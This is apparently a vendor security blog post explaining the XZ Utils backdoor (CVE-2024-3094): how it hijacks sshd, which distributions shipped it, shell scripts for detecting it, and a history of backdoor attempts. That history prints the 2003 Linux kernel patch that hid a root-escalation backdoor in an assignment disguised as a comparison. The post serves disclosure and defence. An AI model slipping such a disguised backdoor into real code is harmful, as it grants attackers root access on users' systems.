The XZ Utils backdoor (CVE-2024-3094): Everything you need to know, and more

On March 28, 2024, a backdoor in the popular xz-utils package impacting the sshd binary was found and assigned CVE-2024-3094. Since then, the industry and community have produced a number of analyses and facts about this attack. While the situation is still developing, we now have a better collective understanding of how the attack took place and its impact.

This post provides the key points to be aware of. Rather than duplicate existing information, we curate a list of high-quality external references. Finally, as "what's old is new," we share a history of attempts to backdoor open source software, dating as far back as 49 years ago.

Key points and observations

On March 28, 2024, a backdoor was identified in the popular xz-utils package and reported to the oss-security@openwall mailing list one day later, on March 29. It was assigned CVE-2024-3094 and affects versions 5.6.0 and 5.6.1.
When infecting a system, the backdoor would change the behavior of the sshd binary and allow an attacker with knowledge of a specific private key to remotely execute arbitrary code on the machine.
The backdoor was packaged in several Linux distributions for several days:
- Fedora Linux 40 beta and Fedora Rawhide (see advisory)
- Debian unstable, testing, and experimental (see advisory)
- Kali Linux (see advisory)
- Arch Linux 2024.03.01, VM images 20240301.218094 to 20240315.221711 and container images created between and including 2024-02-24 and 2024-03-28 (see advisory)
- The full list of distributions embedding vulnerable versions can be found on Repology
To the best of the industry's knowledge, the backdoor has not been packaged in other widely used distributions such as Ubuntu or Amazon Linux.
The attack has attracted extensive industry and media coverage and is widely regarded as an advanced, multi-year, and likely state-sponsored operation.

How the backdoor works

When a malicious version of xz-utils is installed, a malicious shared object (SO) file, the liblzma library, is stored on disk. On Linux-based OSes, SO files are analogous to Windows DLLs.

The SSH server binary sshd is, like many binaries, dynamically linked: by design, it loads shared libraries from disk when it starts. On distributions that patch sshd to link against libsystemd, which in turn depends on the liblzma library shipped with xz-utils, sshd loads the malicious SO file from disk at startup. This file contains the actual backdoor, which you'll see referred to as the "payload."

Under certain (common) conditions, the backdoor hijacks a specific OpenSSL function, RSA_public_decrypt. While the SSH server believes it's calling OpenSSL, it's actually calling the backdoor. The backdoor embeds a mechanism that allows an attacker with knowledge of a specific private key to execute arbitrary code on the machine. To stay under the radar, it preserves normal functionality, so SSH features keep working as usual.
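To make the loading chain concrete, here is a minimal sketch that lists which relevant libraries a local sshd would load. It assumes ldd and sshd are available on the machine; libs_of_interest is a helper name of our own, and the set of library names it looks for (liblzma, libsystemd, libcrypto) is an illustrative choice. On distributions where sshd reaches liblzma through libsystemd, both should show up.

```shell
#!/bin/bash
# Sketch: list which libraries of interest appear in ldd-style output.
# libs_of_interest is a hypothetical helper; it only parses text on stdin.
libs_of_interest() {
  # Print each matching library name once (names can appear twice per line).
  grep -oE 'lib(lzma|systemd|crypto)\.so[.0-9]*' | sort -u
}

# Only inspect sshd if it is installed on this machine.
sshd_path="$(command -v sshd || true)"
if [ -n "$sshd_path" ]; then
  ldd "$sshd_path" | libs_of_interest
fi
```

If liblzma does not appear in the output, sshd on that system does not load it, and this particular attack path is unlikely to apply.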

External references and analysis

Below, we share external references, grouped by type so you can pick the ones most relevant to you.

Reporting from mainstream media:

CERT advisories: CERT-EU, CISA, CIRCL-LU

"Historical" official references:

"Comprehensive" references:

FAQ on the xz-utils backdoor (CVE-2024-3094), by a Gentoo developer
Timeline of the xz open source attack
Everything I Know About the XZ Backdoor

OSINT analysis:

In-depth analysis of the backdoor and/or delivery mechanism:

Reproduction and open source:

Infographics:

https://infosec.exchange/@fr0gger/112189232773640259

Discussion and higher-level analysis:

How to check if you're affected

To check if a system is affected, you can run xz --version. If the output contains 5.6.0 or 5.6.1, you're likely running a backdoored version of xz.
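If you want to script this check, the sketch below wraps the version comparison in two small helpers. The function names are our own, and the parsing assumes the first line of the output looks like "xz (XZ Utils) 5.6.1". Treat a match as a prompt to consult your distribution's advisory rather than as proof of compromise.

```shell
#!/bin/bash
# Sketch: flag xz version strings that match the affected releases.
# Both helper names are hypothetical and not part of xz-utils.
is_backdoored_version() {
  case "$1" in
    5.6.0|5.6.1) return 0 ;;
    *) return 1 ;;
  esac
}

extract_xz_version() {
  # Print the first dotted version number found on the first line of the text.
  printf '%s\n' "$1" | head -n 1 | grep -oE '[0-9]+\.[0-9]+\.[0-9]+' | head -n 1
}

# Only run xz if it is installed on this machine.
if command -v xz >/dev/null 2>&1; then
  version="$(extract_xz_version "$(xz --version)")"
  if is_backdoored_version "$version"; then
    echo "xz $version: affected release, check your distribution's advisory"
  else
    echo "xz $version: not one of the affected releases"
  fi
fi
```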

As relying on a potentially backdoored binary isn't ideal, you can also use the detect.sh script that was shared on the Openwall oss-security mailing list:

#! /bin/bash

set -eu

# find path to liblzma used by sshd
# ("|| true" keeps "set -e" from aborting when sshd does not link liblzma)
path="$(ldd "$(which sshd)" | grep liblzma | grep -o '/[^ ]*' || true)"

# does it even exist?
if [ "$path" == "" ]
then
	echo probably not vulnerable
	exit
fi

# check for function signature
if hexdump -ve '1/1 "%.2x"' "$path" | grep -q f30f1efa554889f54c89ce5389fb81e7000000804883ec28488954241848894c2410
then
	echo probably vulnerable
else
	echo probably not vulnerable
fi
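The signature check at the end of the script is a plain byte search: it dumps the library as a stream of hex digits and looks for a known sequence. Here is a minimal sketch of that technique in isolation. The helper name file_contains_hex is our own, and we use od in place of hexdump as an assumption about what is installed. Because the search runs on hex digits, a match could in principle straddle two half-bytes, which is acceptable for a heuristic like this one.

```shell
#!/bin/bash
# Sketch: report whether a file contains a byte sequence written as hex digits.
# file_contains_hex is a hypothetical helper name; od stands in for hexdump.
file_contains_hex() {
  file="$1"
  pattern="$2"
  # Dump every byte as two hex digits, strip whitespace, then search the stream.
  od -An -v -tx1 "$file" | tr -d ' \n' | grep -q "$pattern"
}

# Usage with a throwaway file holding the bytes f3 0f 1e fa, the first four
# bytes of the signature that detect.sh searches for.
sample="$(mktemp)"
printf '\363\017\036\372' > "$sample"
if file_contains_hex "$sample" f30f1efa; then
  echo "signature found"
fi
rm -f "$sample"
```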

How Datadog can help

Datadog Cloud Security Management (CSM) customers can use CSM Vulnerabilities to identify any virtual machine or container that has been infected with the backdoor, using the query status:Open cve:CVE-2024-3094 (direct link).

Hovering over any affected virtual machine or container shows additional context, such as the cloud account it's running in, its operating system, and misconfigurations that may affect it. From there, you can pivot to observability data such as logs or network connections.

A host affected by a vulnerability

A history of backdooring attempts across the ages

While this supply chain attack on the XZ project is sophisticated and received extensive coverage, it's not the first time that actors have attempted to backdoor software projects, or succeeded in doing so. When something big happens, it's always good to pause and look back. In this section, we tell a few stories from 1975 to 2023 about attempts to backdoor legitimate code.

This list is not exhaustive, but it does showcase that attempts to backdoor code are not new and have taken a number of forms throughout the years. The CNCF TAG Security maintains a list of incidents that, while not comprehensive, catalogs the major events in supply chain security.

1975: The original "meta" backdoor

In 1984, Turing Award winner Ken Thompson published a paper entitled "Reflections on Trusting Trust", where he tells the story of how he had, nearly 10 years earlier, embedded a backdoor into a compiler and disassembler, making it impossible to track by auditing the source code or using the disassembler to examine the malicious machine code.

According to Thompson himself (through secondary research), his backdoor made it to the login command of Bell Labs' Unix Support Group, before being detected a few months later.

2003: The Linux Kernel

In 2003, an unknown actor published a malicious patch to a source control repository of the Linux Kernel:

--- GOOD        2003-11-05 13:46:44.000000000 -0800
+++ BAD 2003-11-05 13:46:53.000000000 -0800
@@ -1111,6 +1111,8 @@
                schedule();
                goto repeat;
        }
+       if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
+                       retval = -EINVAL;
        retval = -ECHILD;
 end_wait4:
        current->state = TASK_RUNNING;

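This backdoor would have allowed an attacker to escalate their privileges to root on any affected system by calling wait4 with the __WCLONE|__WALL option combination. What looks like a comparison of current->uid with 0 is actually an assignment that sets the caller's user ID to 0 (root). Because the assignment itself evaluates to 0, the condition is false and the -EINVAL line never runs, so the call appears to behave normally. Thankfully, maintainers of the kernel caught and removed the malicious code.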
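The same trap can be reproduced in shell arithmetic, where "=" assigns and "==" compares, just as in C. The sketch below is an illustration only: the variable names and the value 3 standing in for (__WCLONE|__WALL) are our own assumptions, not kernel code.

```shell
#!/bin/bash
# Sketch: "=" inside an arithmetic condition assigns instead of comparing.
uid=1000     # unprivileged caller
options=3    # stands in for (__WCLONE|__WALL)

# Looks like a root check, but "uid = 0" assigns 0 and evaluates to 0 (false),
# so the condition fails while uid has silently been overwritten.
check=$(( options == 3 && (uid = 0) ))
echo "disguised check: condition=$check uid=$uid"

# A real comparison leaves uid untouched.
uid=1000
safe=$(( options == 3 && uid == 0 ))
echo "real comparison: condition=$safe uid=$uid"
```

The first line reports a false condition with uid set to 0, while the second reports a false condition with uid still at 1000.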

2012: The Ruby on Rails source code through a GitHub vulnerability

After discovering a vulnerability on GitHub, an individual was able to add their own public key to the popular Ruby on Rails GitHub repository by changing their user ID in an SSH key management feature to that of the targeted project. This addition was used to publish an unreviewed commit to the framework’s main branch. They also shared a write-up on how they had achieved this, while the vulnerability was still present. Additional analysis of this issue was provided by GitHub and a secondary researcher.

2021: The PHP source code

In March 2021, attackers breached an internal git server hosting the PHP source code and committed a malicious change under the names of existing project maintainers. Had it not been caught, it would have allowed attackers to run arbitrary code in any PHP application accepting HTTP requests by sending a specially crafted HTTP header, User-Agentt (sic).

2021: Linux hypocrite commits

Also in 2021, researchers at the University of Minnesota embarked on a controversial (and at the time secret) research project entitled On the Feasibility of Stealthily Introducing Vulnerabilities in Open Source Software via Hypocrite Commits. They submitted a number of intentionally vulnerable or malicious patches and measured how many would be accepted in the stable branch.

Catch rate of Linux hypocrite commits

As can be seen from the table above, many of their malicious changes did go through, and were reverted soon after by a maintainer.

2023: Fake Dependabot commits

In 2023, researchers identified a malicious actor attempting to pose as Dependabot, an application that keeps third-party dependencies up to date, in order to create malicious pull requests in hundreds of repositories. The malicious actor created falsified commit messages and inserted code to steal GitHub secrets and user passwords from victims using compromised contributor accounts.

Backdoors go beyond code

These examples show that backdoors in open source software go well beyond the XZ story. But backdoors also go beyond software, as the following examples show:

- As part of Operation Rubicon, the CIA backdoored encryption devices sold by the Switzerland-based company Crypto AG, starting as early as 1970. This was performed with full knowledge of the Swiss secret services, as outlined by a recent parliamentary report available in French and German.
- The NSA attempted to introduce an intentional backdoor in a random number generator, Dual_EC_DRBG (at one point the default in RSA Security's BSAFE library), so it could covertly decrypt communications secured with protocols such as SSL.
- Documents from the Snowden case demonstrate that in 2013, the NSA had a $250M yearly budget to "insert vulnerabilities into commercial encryption systems, IT systems, networks, and endpoint communications devices."

Conclusion

The XZ backdoor is one of many publicly documented supply chain attacks, but it stands out for its complexity, from both a technical and a human perspective, with the attacker having spent years preparing for the attack. Although the current consensus is that the campaign likely originates from a state-sponsored actor, there remain many unknowns about the attack. Security researchers will continue to investigate this threat for some time to come and will likely uncover more details about its nature and origins in the future.